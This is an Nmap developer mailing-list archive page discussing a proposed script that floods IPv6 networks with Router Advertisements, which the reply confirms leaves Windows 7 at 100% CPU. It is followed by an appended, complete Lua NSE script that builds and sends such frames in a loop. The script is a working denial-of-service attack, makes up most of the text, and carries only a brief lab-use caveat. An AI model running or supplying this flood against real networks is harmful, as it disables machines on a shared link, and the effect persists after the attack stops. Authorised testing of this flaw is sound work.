Nmap Development mailing list archives

Re: [NSE script] IPv6 RA flood


From: David Fifield <david () bamsoftware com>
Date: Fri, 14 Sep 2012 23:40:21 -0700

On Sat, May 05, 2012 at 05:49:52PM +0200, Adam Števko wrote:
Hi guys,

IPv6 deployment is on the rise and there are some protocol
vulnerabilities. One of them is flooding the network with Router
Advertisements, causing machines to recompute route table entries
and leading to 100% CPU utilization. Based on my testing, I found these
platforms vulnerable: Windows (was unusable), Solaris (was usable, but
the console lagged a bit). Linux and FreeBSD were unaffected (the issue
was fixed a few days after it was announced). This work is inspired by
the THC IPv6 suite.

In the future I would like to add support for packet fragmentation and
giving ability to bypass RA Guard, work on more NSE scripts inspired
by tools from THC IPv6 suite and commit them to nmap script library.

Script URL: https://bitbucket.org/xenol/nse-scripts/src/0c9b7397daeb/ipv6-ra-flood.nse

Hi Adam. I'm sorry this script has been ignored for so long.

I changed the script's imports to run under Lua 5.2 and tried it. It
pegged a Windows 7 CPU at 100% almost immediately, and continued to do
so after I killed the Nmap process. It works as advertised.

I'd like to add this script if you'll make just a few simple changes.
Update the code to Lua 5.2; this may be as simple as changing the
require statements. A guide is here: https://secwiki.org/w/Nmap/Lua_5.2.
Don't just choose the first interface from the list if no argument was
given; abort the script. See the prerule of url-snarf for an example.

Since the effect, at least on Windows 7, appears to be persistent, do
you think the script should have a default time limit? It wouldn't be
the first script that runs forever, but I think people are still
surprised when a script does that.

David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
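The three changes requested above (Lua 5.2 `require` calls, a prerule that aborts when no interface was supplied, and a default time limit) are easier to see in code than in prose. The following is an added example written for this archive page; it is not Adam's script from the linked URL and not an Nmap-shipped script. It assumes the NSE API names as used by scripts of that era (`nmap.get_interface`, `nmap.get_interface_info`, `nmap.new_dnet` with `ethernet_open`/`ethernet_send`/`ethernet_close`, `nmap.clock_ms`, `stdnse.parse_timespec`), a script argument named `ipv6-ra-flood.timeout` that I made up for the example, and a documentation prefix (2001:db8::/64 with random middle bytes) and lifetimes chosen for illustration. The Ethernet, IPv6 and ICMPv6 RA bytes are built by hand so that the example does not depend on the `packet` library.

```lua
-- Added example, not the original script: ipv6-ra-flood.nse skeleton
-- showing Lua 5.2 requires, an aborting prerule and a default time limit.
local nmap   = require "nmap"
local stdnse = require "stdnse"

description = [[Floods the local link with ICMPv6 Router Advertisements
carrying random prefixes (added example, not Nmap's own script).]]
author = "example"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"dos", "intrusive"}

-- Assumed script argument name; default limit is 30 seconds so the script
-- does not run forever (the reply above asks for exactly this).
local arg_timeout = stdnse.parse_timespec(
  stdnse.get_script_args(SCRIPT_NAME .. ".timeout") or "30s")

-- Modelled on url-snarf's prerule: abort instead of picking an interface.
prerule = function()
  if nmap.address_family() ~= "inet6" then
    stdnse.debug1("needs Nmap to run in IPv6 mode (-6)")
    return false
  end
  if not nmap.is_privileged() then
    stdnse.verbose1("not running for lack of privileges")
    return false
  end
  if not nmap.get_interface() then
    stdnse.verbose1("no network interface was supplied (-e), aborting")
    return false
  end
  return true
end

-- Pack integer v into n big-endian bytes (pure Lua, no bit library).
local function be(n, v)
  local t = {}
  for i = n, 1, -1 do
    t[i] = string.char(v % 256)
    v = math.floor(v / 256)
  end
  return table.concat(t)
end

local function random_bytes(n)
  local t = {}
  for i = 1, n do t[i] = string.char(math.random(0, 255)) end
  return table.concat(t)
end

-- RFC 2460/4443 checksum: pseudo-header (src, dst, length, next header 58)
-- followed by the ICMPv6 message, one's complement of the 16-bit sum.
local function icmpv6_checksum(src, dst, payload)
  local data = src .. dst .. be(4, #payload) .. "\0\0\0" .. string.char(58) .. payload
  if #data % 2 == 1 then data = data .. "\0" end
  local sum = 0
  for i = 1, #data, 2 do
    sum = sum + data:byte(i) * 256 + data:byte(i + 1)
  end
  while sum > 0xffff do
    sum = math.floor(sum / 65536) + sum % 65536
  end
  return 65535 - sum
end

-- One Ethernet frame: random link-local source, all-nodes destination,
-- RA with a random 2001:db8:xxxx:xxxx::/64 Prefix Information option.
local function build_ra_frame(src_mac)
  local src_ip = "\xfe\x80" .. ("\0"):rep(6) .. random_bytes(8)
  local dst_ip = "\xff\x02" .. ("\0"):rep(13) .. "\x01"          -- ff02::1
  local prefix = "\x20\x01\x0d\xb8" .. random_bytes(4) .. ("\0"):rep(8)
  -- Type 134, code 0, checksum placeholder, cur hop limit 64, flags 0,
  -- router lifetime 1800 s, reachable time 0, retrans timer 0.
  local ra = string.char(134, 0) .. "\0\0" .. string.char(64, 0)
    .. be(2, 1800) .. be(4, 0) .. be(4, 0)
  -- Prefix Information: type 3, length 4 (8-byte units), /64, flags L|A,
  -- valid 86400 s, preferred 14400 s, reserved, prefix.
  ra = ra .. string.char(3, 4, 64, 0xC0) .. be(4, 86400) .. be(4, 14400)
    .. be(4, 0) .. prefix
  ra = ra:sub(1, 2) .. be(2, icmpv6_checksum(src_ip, dst_ip, ra)) .. ra:sub(5)
  -- IPv6 header: version 6, payload length, next header 58, hop limit 255
  -- (hosts discard RAs whose hop limit is not 255).
  local ip6 = be(4, 0x60000000) .. be(2, #ra) .. string.char(58, 255)
    .. src_ip .. dst_ip
  -- All-nodes multicast MAC 33:33:00:00:00:01, EtherType 0x86DD.
  return "\x33\x33\x00\x00\x00\x01" .. src_mac .. "\x86\xdd" .. ip6 .. ra
end

action = function()
  local iface = nmap.get_interface()
  local info = nmap.get_interface_info(iface)
  if not (info and info.mac) then
    return stdnse.format_output(false, ("no MAC address for %s"):format(iface))
  end
  local dnet = nmap.new_dnet()
  dnet:ethernet_open(iface)
  local deadline = nmap.clock_ms() + arg_timeout * 1000
  local sent = 0
  while nmap.clock_ms() < deadline do           -- stop at the time limit
    dnet:ethernet_send(build_ra_frame(info.mac))
    sent = sent + 1
  end
  dnet:ethernet_close()
  return ("sent %d Router Advertisements in %d s"):format(sent, arg_timeout)
end
```

Run only against a lab link you own, e.g. `nmap -6 -e eth0 --script ipv6-ra-flood --script-args ipv6-ra-flood.timeout=10s`; the prerule refuses to run without `-e`, without privileges, or outside IPv6 mode, and the loop stops at the deadline rather than when Nmap is killed. Note that stopping the sender does not undo the effect on hosts that already accepted thousands of prefixes, which is the persistence David observed on Windows 7.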
